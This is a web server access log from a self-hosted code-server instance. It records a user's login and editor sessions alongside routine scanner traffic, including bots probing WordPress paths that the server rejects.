+[27/Jan/2026:05:43:52 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 23.27.145.43] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[27/Jan/2026:05:43:53 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 23.27.145.43] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[27/Jan/2026:06:59:52 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[27/Jan/2026:06:59:52 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[27/Jan/2026:06:59:52 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[27/Jan/2026:06:59:52 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[27/Jan/2026:06:59:54 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[27/Jan/2026:06:59:54 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[27/Jan/2026:06:59:54 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[27/Jan/2026:06:59:54 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[27/Jan/2026:06:59:54 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[27/Jan/2026:06:59:56 +0000] - 302 302 - POST https code.profibot.hu "/login" [Client 84.1.26.27] [Length 31] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[27/Jan/2026:06:59:56 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 58] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[27/Jan/2026:06:59:56 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/opt/service_finder" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[27/Jan/2026:06:59:57 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[27/Jan/2026:06:59:57 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[27/Jan/2026:06:59:57 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[27/Jan/2026:06:59:57 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[27/Jan/2026:06:59:57 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[27/Jan/2026:06:59:58 +0000] - 200 200 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 81] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[27/Jan/2026:06:59:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=7c2f58ca-ba5b-435b-aec5-7bf8b2f0ed38" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[27/Jan/2026:07:00:03 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[27/Jan/2026:08:11:31 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-ligatures/lib/addon-ligatures.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[27/Jan/2026:09:00:40 +0000] - - 400 - GET http code.profibot.hu "/" [Client 84.247.105.135] [Length 654] [Gzip -] [Sent-to ] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[27/Jan/2026:09:00:41 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 173.239.217.5] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[27/Jan/2026:09:00:41 +0000] - 401 401 - GET http code.profibot.hu "/favicon.ico" [Client 173.239.217.5] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[27/Jan/2026:10:00:43 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=43ec8ed5-53c1-4aee-b073-a56111c472f4&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 1132005] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[27/Jan/2026:10:00:43 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=d373c672-1852-4cdc-b792-8ed08ae7176b&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 259907] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[27/Jan/2026:13:30:54 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 34.29.13.137] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:54 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 34.29.13.137] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:54 +0000] - 401 401 - GET http code.profibot.hu "/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1582] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:54 +0000] - 401 401 - GET http code.profibot.hu "/xmlrpc.php?rsd" [Client 34.29.13.137] [Length 1555] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:55 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 34.29.13.137] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:55 +0000] - 401 401 - GET http code.profibot.hu "/blog/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:55 +0000] - 401 401 - GET http code.profibot.hu "/web/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:55 +0000] - 401 401 - GET http code.profibot.hu "/wordpress/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:55 +0000] - 401 401 - GET http code.profibot.hu "/website/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:55 +0000] - 401 401 - GET http code.profibot.hu "/wp/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:55 +0000] - 401 401 - GET http code.profibot.hu "/news/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:56 +0000] - 401 401 - GET http code.profibot.hu "/2018/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:56 +0000] - 401 401 - GET http code.profibot.hu "/2019/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:56 +0000] - 401 401 - GET http code.profibot.hu "/shop/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:56 +0000] - 401 401 - GET http code.profibot.hu "/wp1/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:56 +0000] - 401 401 - GET http code.profibot.hu "/test/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:56 +0000] - 401 401 - GET http code.profibot.hu "/media/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:56 +0000] - 401 401 - GET http code.profibot.hu "/wp2/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:57 +0000] - 401 401 - GET http code.profibot.hu "/site/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:57 +0000] - 401 401 - GET http code.profibot.hu "/cms/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[27/Jan/2026:13:30:57 +0000] - 401 401 - GET http code.profibot.hu "/sito/wp-includes/wlwmanifest.xml" [Client 34.29.13.137] [Length 1609] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[28/Jan/2026:02:30:46 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 162.142.125.119] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:02:30:50 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 162.142.125.119] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:02:30:51 +0000] - 401 401 - GET https code.profibot.hu "/./_static/src/browser/media/favicon-dark-support.svg" [Client 162.142.125.119] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:02:30:52 +0000] - 401 401 - GET https code.profibot.hu "/./_static/src/browser/media/pwa-icon-192.png" [Client 162.142.125.119] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:02:30:52 +0000] - 401 401 - GET https code.profibot.hu "/./_static/src/browser/media/pwa-icon-512.png" [Client 162.142.125.119] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:02:30:53 +0000] - 401 401 - GET https code.profibot.hu "/favicon.ico" [Client 162.142.125.119] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:03:06:32 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 206.168.34.202] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:03:06:36 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 206.168.34.202] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:03:06:42 +0000] - 401 401 - GET http code.profibot.hu "/./_static/src/browser/media/favicon-dark-support.svg" [Client 206.168.34.202] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:03:06:50 +0000] - 401 401 - GET http code.profibot.hu "/./_static/src/browser/media/pwa-icon-512.png" [Client 206.168.34.202] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:03:06:51 +0000] - 401 401 - GET http code.profibot.hu "/favicon.ico" [Client 206.168.34.202] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[28/Jan/2026:03:25:45 +0000] - 200 200 - GET https code.profibot.hu "/robots.txt" [Client 74.7.175.129] [Length 26] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[28/Jan/2026:06:50:28 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[28/Jan/2026:06:50:28 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[28/Jan/2026:06:50:28 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[28/Jan/2026:06:50:28 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[28/Jan/2026:06:50:29 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[28/Jan/2026:06:50:29 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[28/Jan/2026:06:50:29 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[28/Jan/2026:06:50:30 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[28/Jan/2026:06:50:32 +0000] - 302 302 - POST https code.profibot.hu "/login" [Client 84.1.26.27] [Length 31] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[28/Jan/2026:06:50:32 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 58] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[28/Jan/2026:06:50:32 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/opt/service_finder" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[28/Jan/2026:06:50:33 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[28/Jan/2026:06:50:33 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[28/Jan/2026:06:50:33 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[28/Jan/2026:06:50:34 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[28/Jan/2026:06:50:35 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[28/Jan/2026:06:50:35 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[28/Jan/2026:06:50:37 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[28/Jan/2026:06:50:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=fb38ed9b-dcb8-4009-91dc-80eedc07512d" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[28/Jan/2026:06:50:43 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[28/Jan/2026:06:50:47 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-ligatures/lib/addon-ligatures.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[28/Jan/2026:07:06:21 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fshellscript%2Flanguage-configuration.json&tkn=" [Client 84.1.26.27] [Length 211] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[28/Jan/2026:07:15:24 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fyaml%2Flanguage-configuration.json&tkn=" [Client 84.1.26.27] [Length 250] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" 